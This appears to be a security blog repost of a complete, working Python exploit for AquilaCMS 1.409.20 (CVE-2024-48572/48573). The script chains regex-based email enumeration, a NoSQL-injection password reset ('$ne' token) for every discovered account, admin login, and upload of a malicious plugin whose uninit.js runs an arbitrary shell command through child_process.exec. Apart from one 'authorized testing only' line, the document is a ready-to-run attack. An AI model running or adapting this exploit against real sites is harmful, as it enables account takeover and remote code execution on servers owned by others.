Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    863106812

Contributors to this blog

  • HireHackking 16114

About this blog

This blog covers hacking techniques such as penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, and social engineering, which are used to identify and fix security flaws in systems.

# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE)
# Date: 2024-10-25
# Exploit Author: Eui Chul Chung
# Vendor Homepage: https://www.aquila-cms.com/
# Software Link: https://github.com/AquilaCMS/AquilaCMS
# Version: v1.409.20
# CVE: CVE-2024-48572, CVE-2024-48573


import io
import json
import uuid
import string
import zipfile
import argparse
import requests
import textwrap


def unescape_special_characters(email):
    """Return *email* with bracket-escaped regex metacharacters made literal.

    Each escaped token (a metacharacter wrapped in square brackets, with the
    caret additionally backslash-escaped) is replaced by the bare character.
    Replacements run sequentially in the order listed below, so the output of
    one step is visible to the following steps.
    """
    escaped_tokens = (
        ("[$]", "$"),
        ("[*]", "*"),
        ("[+]", "+"),
        ("[-]", "-"),
        ("[.]", "."),
        ("[?]", "?"),
        (r"[\^]", "^"),
        ("[|]", "|"),
    )

    plain = email
    for token, literal in escaped_tokens:
        plain = plain.replace(token, literal)
    return plain


def get_user_emails():
    """Enumerate registered e-mail addresses one character at a time.

    Starting from the anchor ``^``, every known prefix is extended with each
    token of the alphabet and sent as ``<prefix><token>.*`` in the ``email``
    field of a ``PUT {args.url}/api/v2/user`` request. A response whose
    ``code`` is ``"UserAlreadyExist"`` is taken to mean the pattern matched
    an existing account (presumably the server evaluates the value as a
    regular expression -- the script only observes the response code).

    A prefix that cannot be extended by any token is recorded as a complete
    address and printed in unescaped form.

    Returns:
        list[str]: the discovered addresses with the leading ``^`` removed.
        Metacharacters stay in their bracket-escaped form; only the printed
        output is unescaped.
    """
    escaped_metachars = ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"]
    alphabet = [
        *string.ascii_lowercase,
        *string.digits,
        *"!#%&'/=@_`{}~",
        *escaped_metachars,
    ]

    discovered = []
    frontier = ["^"]
    while frontier:
        # Process one prefix length per pass; the next pass works on the
        # prefixes that could be extended during this one.
        current, frontier = frontier, []

        for prefix in current:
            extended = []
            for token in alphabet:
                candidate = prefix + token
                response = requests.put(
                    f"{args.url}/api/v2/user", json={"email": f"{candidate}.*"}
                )
                if json.loads(response.text)["code"] == "UserAlreadyExist":
                    extended.append(candidate)

            if extended:
                frontier.extend(extended)
                continue

            # No token extends this prefix: treat it as a full address.
            address = prefix[1:]
            discovered.append(address)
            print(f"[+] {unescape_special_characters(address)}")

    return discovered


def reset_password(email):
    """Run the two-step password reset for *email* and print the result.

    Both requests go to ``{args.url}/api/v2/user/resetpassword``:

    1. a POST carrying only the e-mail address;
    2. a POST carrying the new password (``args.password``) together with a
       ``token`` value of ``{"$ne": None}`` instead of a concrete token.

    Neither response is inspected, so the printed line reports what was
    attempted rather than a confirmed outcome.
    """
    endpoint = f"{args.url}/api/v2/user/resetpassword"

    # Step 1: request a reset for the address.
    requests.post(endpoint, json={"email": email})

    # Step 2: submit the new password with the operator-valued token.
    requests.post(
        endpoint, json={"token": {"$ne": None}, "password": args.password}
    )

    print(f"[+] {unescape_special_characters(email)} : {args.password}")


def get_admin_auth_token(emails):
    """Return the auth token of the first address that logs in as admin.

    Each address in *emails* is tried, in order, against
    ``{args.url}/api/v2/auth/login/admin`` with ``args.password``. The first
    HTTP 200 response wins: the address is printed (unescaped) and the
    ``data`` field of the JSON body is returned.

    Returns:
        The ``data`` value of the successful login response, or ``None``
        when no address produced a 200 response.
    """
    for candidate in emails:
        credentials = {"username": candidate, "password": args.password}
        response = requests.post(
            f"{args.url}/api/v2/auth/login/admin", json=credentials
        )

        if response.status_code != 200:
            continue

        print(f"[+] Administrator account : {unescape_special_characters(candidate)}")
        return json.loads(response.text)["data"]

    return None


def create_plugin(plugin_name):
    """Build an in-memory plugin archive named *plugin_name*.

    The zip contains three files under a top-level ``<plugin_name>/``
    directory: ``package.json`` (holding the name), ``info.json`` (an empty
    ``info`` object) and ``uninit.js``, a Node.js module that passes
    ``args.command`` to ``child_process.exec``.

    Returns:
        io.BytesIO: the archive, rewound to offset 0 so it can be read or
        uploaded directly.
    """
    # The template is dedented after interpolation, exactly as written.
    payload = textwrap.dedent(
        f"""
    const {{ exec }} = require("child_process");

    /**
     * This function is called when the plugin is desactivated or when we delete it
     */
    module.exports = async function (resolve, reject) {{
      try {{
        exec("{args.command}");
        return resolve();
      }} catch (error) {{}}
    }};
    """
    ).strip()

    # Insertion order of this dict is the order of the archive members.
    entries = {
        "package.json": f'{{ "name": "{plugin_name}" }}'.encode(),
        "info.json": b'{ "info": {} }',
        "uninit.js": payload.encode(),
    }

    archive = io.BytesIO()
    with zipfile.ZipFile(
        archive, mode="a", compression=zipfile.ZIP_DEFLATED, allowZip64=False
    ) as bundle:
        for filename, content in entries.items():
            bundle.writestr(f"{plugin_name}/{filename}", content)

    archive.seek(0)
    return archive


def rce(emails):
    """Upload a generated plugin as an administrator and deactivate it.

    Steps, each announced on stdout:

    1. obtain an admin token via ``get_admin_auth_token(emails)``; stop if
       none is available;
    2. build a plugin with a random hex name via ``create_plugin``;
    3. upload it to ``/api/v2/modules/upload`` (response not inspected);
    4. list modules through ``/api/v2/modules`` and look up the ``_id`` of
       the entry whose ``name`` equals the plugin name; stop if absent;
    5. POST ``active: False`` for that id to ``/api/v2/modules/toggle`` and
       report success when the response status is 200.

    Returns:
        None. Progress and outcome are reported through ``print`` only.
    """
    token = get_admin_auth_token(emails)
    if token is None:
        print("[-] Administrator account not found")
        return

    # The same Authorization header is sent with every request below.
    auth_headers = {"Authorization": token}

    print("[+] Create malicious plugin")
    plugin_name = uuid.uuid4().hex
    archive = create_plugin(plugin_name)

    print("[+] Upload plugin")
    upload = {"file": (f"{plugin_name}.zip", archive, "application/zip")}
    requests.post(
        f"{args.url}/api/v2/modules/upload", headers=auth_headers, files=upload
    )

    print("[+] Find uploaded plugin")
    listing = requests.post(
        f"{args.url}/api/v2/modules",
        headers=auth_headers,
        json={"PostBody": {"limit": 0}},
    )
    modules = json.loads(listing.text)["datas"]

    plugin_id = None
    match = next(
        (module for module in modules if module["name"] == plugin_name), None
    )
    if match is not None:
        plugin_id = match["_id"]
        print(f"[+] Plugin ID : {plugin_id}")

    if plugin_id is None:
        print("[-] Plugin not found")
        return

    print("[+] Deactivate plugin")
    toggle = requests.post(
        f"{args.url}/api/v2/modules/toggle",
        headers=auth_headers,
        json={"idModule": plugin_id, "active": False},
    )

    outcome = (
        "[+] Command execution succeeded"
        if toggle.status_code == 200
        else "[-] Command execution failed"
    )
    print(outcome)


def main():
    """Run the three stages in order: enumerate, reset, execute.

    The addresses returned by ``get_user_emails`` are passed unchanged to
    ``reset_password`` (once per address) and then, as a list, to ``rce``.
    """
    print("[*] Retrieve email addresses")
    harvested = get_user_emails()

    print("\n[*] Reset password")
    for address in harvested:
        reset_password(address)

    print("\n[*] Perform remote code execution")
    rce(harvested)


if __name__ == "__main__":
    # Command-line entry point. ``args`` is intentionally a module-level
    # name: the helper functions above read args.url, args.password and
    # args.command directly.
    parser = argparse.ArgumentParser(
        description=(
            "Proof of concept for CVE-2024-48572 / CVE-2024-48573 in "
            "AquilaCMS 1.409.20. Use only against systems you own or are "
            "explicitly authorized to test."
        )
    )
    parser.add_argument(
        "-u",
        dest="url",
        help="Site URL including the scheme (e.g. http://localhost:3010)",
        type=str,
        required=True,
    )
    parser.add_argument(
        "-p",
        dest="password",
        help="Password to use for password reset (e.g. HaXX0r3d!)",
        type=str,
        default="HaXX0r3d!",
    )
    parser.add_argument(
        "-c",
        dest="command",
        help="Command to execute (e.g. touch /tmp/pwned)",
        type=str,
        default="touch /tmp/pwned",
    )
    args = parser.parse_args()

    # requests refuses URLs without a scheme (MissingSchema), so report the
    # problem as a usage error instead of failing with a traceback on the
    # first HTTP call.
    if not args.url.lower().startswith(("http://", "https://")):
        parser.error("-u must include the scheme, e.g. http://localhost:3010")

    # Endpoint paths are appended as "/api/...", so drop any trailing slash
    # to avoid building "//api/..." URLs.
    args.url = args.url.rstrip("/")

    main()